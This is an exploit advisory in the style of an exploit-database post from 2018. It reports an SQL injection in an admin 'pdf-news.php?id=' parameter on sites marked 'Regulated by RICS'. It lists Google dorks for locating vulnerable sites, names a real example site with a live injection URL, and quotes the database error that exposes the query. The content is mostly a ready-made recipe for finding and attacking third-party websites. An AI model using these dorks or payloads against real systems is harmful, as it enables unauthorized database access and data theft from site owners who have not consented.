#################################################################################################
# Exploit Title : Regulated by Rics.Org PDF News England SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 29/05/2018
# Vendor Homepage : rics.org
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Google Dork 1 : inurl:''/admin/pdf-news.php?id=''
# Google Dork 2 : intext:''Regulated by RICS.''
# Exploit : /admin/pdf-news.php?id=[SQL Injection ]
#################################################################################################
# Example Site => htc.uk.com/admin/pdf-news.php?id=14%27 [ Proof of Concept for SQL Injection ] => archive.is/oZeKp
# SQL/DB Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1: select * from news where news_id = 14'
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################